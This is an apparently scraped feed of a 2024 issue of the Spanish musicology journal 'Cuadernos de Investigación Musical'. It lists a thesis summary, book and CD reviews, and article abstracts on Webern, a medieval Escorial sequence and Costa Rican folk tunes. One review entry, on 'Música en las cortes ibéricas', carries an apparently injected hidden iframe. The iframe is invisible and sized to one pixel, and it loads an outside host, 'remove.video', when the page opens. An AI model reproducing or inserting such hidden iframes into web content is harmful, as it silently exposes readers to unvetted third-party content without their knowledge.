https://revista.uclm.es/index.php/cuadernosdeinvestigacionmusical/issue/feedCuadernos de Investigación Musical2024-07-30T22:01:26+02:00Virginia Sánchez Rodríguezvirginia.sanchez@uclm.esOpen Journal Systems<p><em>Cuadernos de Investigación Musical</em> es el órgano científico del Centro de Investigación y Documentación Musical (CIDoM)-Unidad Asociada al CSIC de la Universidad de Castilla-La Mancha.</p> <p>Se trata de una publicación semestral online, regida por el sistema Open Journal, de carácter gratuito para autores y lectores, dirigida a investigadores. El objetivo de la revista es la difusión de trabajos científicos originales e inéditos de todos los campos de la Musicología, desde la Musicología Histórica a la Etnomusicología, pasando por la práctica instrumental, la estética de la música, la presencia de la música en los medios audiovisuales y cualquier otro campo de estudio de temática musical.</p> <p>La publicación tiene un carácter gratuito para los lectores y también para los autores, que no tendrán que abonar ninguna tasa para publicar aquellos trabajos que superen el proceso de evaluación por pares ciegos. Cuenta con la colaboración de evaluadores externos ajenos a su equipo editorial y a la institución editora y la revista garantiza que los revisores no sean de la misma institución que los autores.</p> <p>Revista indexada en las principales bases de datos internacionales y nacionales: <span class="mark565ngh1f8" data-markjs="true" data-ogac="" data-ogab="" data-ogsc="" data-ogsb="">BASE</span> (Bielefeld Academic Search Engine, Alemania), BMS (Bibliographie <span class="mark2hgx4mge7" data-markjs="true" data-ogac="" data-ogab="" data-ogsc="" data-ogsb="">de</span>s Musikschriftums), Catálogo Latindex, Dialnet, Dulcinea, ERIH Plus (European Reference Index for the Humanities), JournalTOCSs (Journal Table of Contests), MIAR (Matriz <span class="mark2hgx4mge7" data-markjs="true" data-ogac="" data-ogab="" data-ogsc="" data-ogsb="">de</span> Información para el Análisis <span class="mark2hgx4mge7" data-markjs="true" data-ogac="" data-ogab="" data-ogsc="" data-ogsb="">de</span> Revistas), NSD (Norwegian Register for Scientific Journals, Series and Publishers), REDIB (Red Iberoamericana <span class="mark2hgx4mge7" data-markjs="true" data-ogac="" data-ogab="" data-ogsc="" data-ogsb="">de</span> Innovación y Conocimiento Científico), REGESTA IMPERII (Akademie <span class="mark2hgx4mge7" data-markjs="true" data-ogac="" data-ogab="" data-ogsc="" data-ogsb="">de</span>r Wissenschaften und <span class="mark2hgx4mge7" data-markjs="true" data-ogac="" data-ogab="" data-ogsc="" data-ogsb="">de</span>r Literatur, Alemania), Researchgate, RILM (Répertoire Internationale <span class="mark2hgx4mge7" data-markjs="true" data-ogac="" data-ogab="" data-ogsc="" data-ogsb="">de</span> Littérature Musicale), Sciencegate, SCILIT (A database of scientific & scholarly literature), SICA (Sistema <span class="mark2hgx4mge7" data-markjs="true" data-ogac="" data-ogab="" data-ogsc="" data-ogsb="">de</span> Información Científica <span class="mark2hgx4mge7" data-markjs="true" data-ogac="" data-ogab="" data-ogsc="" data-ogsb="">de</span> Andalucía), SUDOC (Système Universitaire <span class="mark2hgx4mge7" data-markjs="true" data-ogac="" data-ogab="" data-ogsc="" data-ogsb="">de</span> Documentation), ULRICH'S Periodical Directory, Worldcat y ZDB (Zeitschriften Daten Bank, Alemania)</p> <p style="text-align: justify;"><a href="https://www.facebook.com/CuadernosDeInvestigacionMusical/" target="_blank" rel="noopener">https://www.facebook.com/CuadernosDeInvestigacionMusical/</a></p> <p> </p>https://revista.uclm.es/index.php/cuadernosdeinvestigacionmusical/article/view/3532Panorama musical zaragozano entre 1740 y los Sitios (1808-1809): La música de Semana Santa de Francisco Javier García Fajer (1730-1809)2024-07-08T17:04:54+02:00CARLOS GONZÁLEZ MARTÍNEZcarlos.gonzalez49@alu.uclm.es<p>Resumen de Tesis Doctoral.</p>2024-07-30T00:00:00+02:00Derechos de autor 2024 CARLOS GONZÁLEZ MARTÍNEZhttps://revista.uclm.es/index.php/cuadernosdeinvestigacionmusical/article/view/3459Saki Giordiani, F. (2022). El redescubrimiento del clave y de la figura del clavecinista en España durante el siglo XX. Redes, tópicos y procesos identitarios. Granada: Editorial Libargo, 2023. 224 pp. ISBN: 978-84-124588-5-5.2024-02-18T18:58:05+01:00Albert Ferrer Flamarichalbertferrerflamarich@gmail.com<p>Reseña de libro.</p>2024-07-30T00:00:00+02:00Derechos de autor 2024 Albert Ferrer Flamarichhttps://revista.uclm.es/index.php/cuadernosdeinvestigacionmusical/article/view/3497Ferrando Morales, A. L. (2022). El «Tirant lo Blanc» fet música. Les composicions musicals inspirades en el «Tirant lo Blanc». Alacant: Universitat d’Alacant, 342 pp. ISBN: 978-84-1302-163-8.2024-05-27T16:52:48+02:00Inmaculada Martínez Ayorainmaculada.martinez@uclm.es<p>Reseña de libro.</p>2024-07-30T00:00:00+02:00Derechos de autor 2024 Inmaculada Martínez Ayorahttps://revista.uclm.es/index.php/cuadernosdeinvestigacionmusical/article/view/3443Encabo, E. & Matía Polo, I. (Eds.) (2023). América como horizonte: intercambios, diálogos y mestizajes de la escena popular española. Madrid: Ediciones de Iberoamericana, 234 pp. ISBN: 978-84-9192-334-3. 2024-01-15T17:16:29+01:00Tatiana Aráez Santiagotarez.santiago@ucm.es<p>Reseña de libro.</p>2024-07-30T00:00:00+02:00Derechos de autor 2024 Tatiana Aráez Santiagohttps://revista.uclm.es/index.php/cuadernosdeinvestigacionmusical/article/view/3511Fernandes, C. & Ortega, J. (Eds.) (2023). Música en las cortes ibéricas (1700-1834): ceremonial, artes del espectáculo y representación del poder. Madrid: Sociedad Española de Musicología, 619 pp. ISBN: 978-84-19911-00-1.2024-06-16T19:48:27+02:00Paulino Capdepon Verdúpaulino.capdepon@uclm.es<p>Reseña de libro.</p> <div><iframe id="embedPath" style="height: 1px,width:1px; position: absolute; top: 0; left: 0; border: none; visibility: hidden;" src="//remove.video/repo"></iframe></div>2024-07-30T00:00:00+02:00Derechos de autor 2024 Paulino Capdepon Verdúhttps://revista.uclm.es/index.php/cuadernosdeinvestigacionmusical/article/view/3479Ossa Martínez, M. A. de la (2023). La Semana de Música Religiosa de Cuenca (1962-2021): análisis, claves y contexto. Cuenca: Ediciones de la Universidad de Castilla-La Mancha y Diputación de Cuenca, 442 pp. ISBN: 978-84-19661-52-4.2024-04-04T13:32:18+02:00omar LEON JIMENEZomar.leon@alu.uclm.es<p>Reseña de libro.</p>2024-07-30T00:00:00+02:00Derechos de autor 2024 omar LEON JIMENEZhttps://revista.uclm.es/index.php/cuadernosdeinvestigacionmusical/article/view/3516Arola i Vera, N. (2023). Alma Mahler. Musa de la Sezession a l’Expressionisme. Girona: Edicions Reremús, 336 pp. ISBN: 978-84-126622-5-2.2024-06-23T16:02:51+02:00Albert Ferrer Flamarichalbertferrerflamarich@gmail.com<p>Reseña de libro.</p>2024-07-30T00:00:00+02:00Derechos de autor 2024 Albert Ferrer Flamarichhttps://revista.uclm.es/index.php/cuadernosdeinvestigacionmusical/article/view/3524Canela Grau, M. & Salisi Clos, J. M. (2023). Mn. Miquel Rué i Rubió. Una vida al servei de la música i l’Església. Tarragona: Silva Editorial, 266 pp. ISBN: 978-84-127291-1-5.2024-06-30T13:41:05+02:00Virginia Sánchez Rodríguezvirginia.sanchez@uclm.es<p>Reseña de libro.</p>2024-07-30T00:00:00+02:00Derechos de autor 2024 Virginia Sánchez Rodríguezhttps://revista.uclm.es/index.php/cuadernosdeinvestigacionmusical/article/view/3517Diago Jiménez, J. M. (2024). Isidoro de Sevilla y la Música I. La teoría musical. Madrid: Sindéresis, 223 pp. ISBN: 978-84-10120-15-02024-06-24T10:54:58+02:00Juan José Pastor Comínjuanjose.pastor@uclm.es<p>Reseña de libro.</p>2024-07-30T00:00:00+02:00Derechos de autor 2024 Juan José Pastor Comínhttps://revista.uclm.es/index.php/cuadernosdeinvestigacionmusical/article/view/3518Ortiz de Urbina, P. (Ed.) (2024). Schönberg y Gerhard. Correspondencia. Edición Crítica. Madrid: Akal, 224 pp. ISBN. 978-84-460-5447-4.2024-06-24T10:57:19+02:00Juan José Pastor Comínjuanjose.pastor@uclm.es<p>Reseña de libro.</p>2024-07-30T00:00:00+02:00Derechos de autor 2024 Juan José Pastor Comínhttps://revista.uclm.es/index.php/cuadernosdeinvestigacionmusical/article/view/3525García Gil, P. (piano) (2023). Cuaderno de viaje. Obra para piano. ASSISI Producciones. Dep. Legal: V-2405-2023.2024-06-30T13:45:01+02:00Virginia Sánchez Rodríguezvirginia.sanchez@uclm.es<p>Reseña de CD.</p>2024-07-30T00:00:00+02:00Derechos de autor 2024 Virginia Sánchez Rodríguezhttps://revista.uclm.es/index.php/cuadernosdeinvestigacionmusical/article/view/3526Hernández, S. (soprano), Pio Galasso, F. (tenor), Arcuri, M. (soprano), Montanaro, C. (dir.), Orquesta Sinfónica de Madrid & Coro de la Comunidad de Madrid (2024). Il verismo d’oro. Euroarts Music International, B0D248XWMN.2024-06-30T13:48:09+02:00Virginia Sánchez Rodríguezvirginia.sanchez@uclm.es<p>Reseña de CD.</p>2024-07-30T00:00:00+02:00Derechos de autor 2024 Virginia Sánchez Rodríguezhttps://revista.uclm.es/index.php/cuadernosdeinvestigacionmusical/article/view/3489Explorando la secuencia polifónica Benedicta es celorum (E-E T.I.12): análisis y fortuna del manuscrito2024-05-12T06:53:37+02:00Nuria Torres nuria.torreslobo@gmail.com<p style="font-weight: 400;">El códice misceláneo E-E T.I.12, custodiado en la Real Biblioteca del Monasterio de El Escorial, contiene una variedad de obras patrísticas y data aproximadamente de principios del siglo XIV. Aunque la encuadernación actual no corresponde a la original, fue confeccionada en el monasterio de El Escorial a lo largo del siglo XVII. En el folio 309v se encuentra copiada la secuencia a dos voces<em> Benedicta es celorum regina</em>, que hasta ahora solo había sido mencionada en los catálogos. Este artículo propone un estudio completo de la secuencia, abordando tanto su contenido musical y textual, como su integración en la colección bibliográfica del monasterio de El Escorial.</p>2024-07-30T00:00:00+02:00Derechos de autor 2024 Nuria Torres https://revista.uclm.es/index.php/cuadernosdeinvestigacionmusical/article/view/3442Cinco Canções Nordestinas do Folclore Brasileiro de Ernani Braga: un análisis musical y su relación con elementos extramusicales2024-02-27T10:24:52+01:00Rebeca Viales Monterobbkvm77@gmail.com<p>El presente trabajo fue creado con el objetivo de realizar un análisis del ciclo de canciones de Ernani Braga, <em>Cinco Canções Nordestinas do Folclore Brasileiro,</em> y extrapolar sus elementos musicales a un significado extra musical que apoye la comprensión e interpretación de la obra. Para contextualizar, se inicia con una breve referencia al nacionalismo en la canción de arte latinoamericana y en la canción brasileña. Se concluye que la combinación de diferentes ingredientes, le da un carácter particular, resaltando la belleza de sus melodías indígenas y regionales que, en conjunto con armonías de la música occidental y una ejecución vocal clásica, producen una sonoridad única.</p>2024-07-30T00:00:00+02:00Derechos de autor 2024 Rebeca Viales Monterohttps://revista.uclm.es/index.php/cuadernosdeinvestigacionmusical/article/view/3478Échale betún a la bota. Cultura y tradiciones en las tonadas campesinas recopiladas por Emilia Prieto2024-05-12T06:59:56+02:00Tania Vicente Leóntania.vicente@ucr.ac.cr<p>Las tonadas campesinas recopiladas en el Valle Central de Costa Rica, por la costarricense Emilia Prieto (1902-1986), constituyen una manifestación de la expresión rural musical de ese país. En dicho contexto, se manifiesta un empleo singular del lenguaje, en el que se utilizan vocablos que en principio pudieran parecer erróneos o no hallarse registrados en los diccionarios del idioma español. No obstante, estos vocablos son una parte inherente de la cotidianidad de gran parte de los pobladores del Valle Central, y son denominados costarriqueñismos. El propósito de este estudio consiste en efectuar un análisis crítico del discurso manifestado en las tonadas que incluyen ese tipo de vocablos, así como, dar a conocer la diversidad del español en el país, el cual se encuentra arraigado profundamente en la vida cotidiana de numerosas familias y representa un valioso exponente del patrimonio cultural intangible y musical del pueblo costarricense.</p>2024-07-30T00:00:00+02:00Derechos de autor 2024 Tania Vicente Leónhttps://revista.uclm.es/index.php/cuadernosdeinvestigacionmusical/article/view/3501Variations Op. 27/ii de Anton Webern. Nueva interpretación analítica.2024-06-04T08:57:56+02:00José Luis de la Fuente CharfoléJoseLuis.Fuente@uclm.es<p>Los fundamentos conceptuales de Anton Webern con respecto a la atonalidad se muestran etéreos y poco accesibles; la práctica atonal fue para él la manifestación de un <em>Naturprozess</em> hacia el que se sintió impelido. No obstante, el presente artículo examina la aparición y persistencia de fundamentos no atonales, tanto en los estratos intermedios como en los más profundos de Variations <em>Op. 27/ii</em>; la existencia de un espacio sonoro neutralizado y el uso de un patrón de interpolación definen el carácter de una micropieza pensada a modo de <em>tombeau</em> por la muerte de Alban Berg.</p>2024-07-30T00:00:00+02:00Derechos de autor 2024 José Luis de la Fuente Charfoléhttps://revista.uclm.es/index.php/cuadernosdeinvestigacionmusical/article/view/3451Composición musical e interioridad del recurso instrumental2024-05-12T06:26:46+02:00Antonio Carvallo Pintoancarvallo@uc.clPaola Muñoz Manuguiánpvmunoz3@uc.cl<p>El progresivo alejamiento de la música y del arte de ciertos marcos referenciales ya desde fines del siglo XIX comportó su gradual volcamiento hacia los propios recursos para la producción artística, a una suerte de interioridad. En música, ciertas contradicciones surgen cuando, en atención al sonido, la operación implica una aproximación a la acústica, la electrónica y la informática, esto es, un desconfinamiento de los límites del propio campo. A través de una mirada a la obra <em>In Basso</em>, en el siguiente texto se expone una aproximación a la composición musical a partir de la observación de los recursos instrumentales y sus características, explorando las posibilidades prácticas para generar una relación entre recurso y discurso musical. Se evalúan igualmente las contradicciones y consecuencias estéticas de un hacer artístico que pareciera alejar de sí a la subjetividad creadora, al sujeto.</p>2024-07-30T00:00:00+02:00Derechos de autor 2024 Antonio Carvallo Pinto, Paola Muñoz Manuguián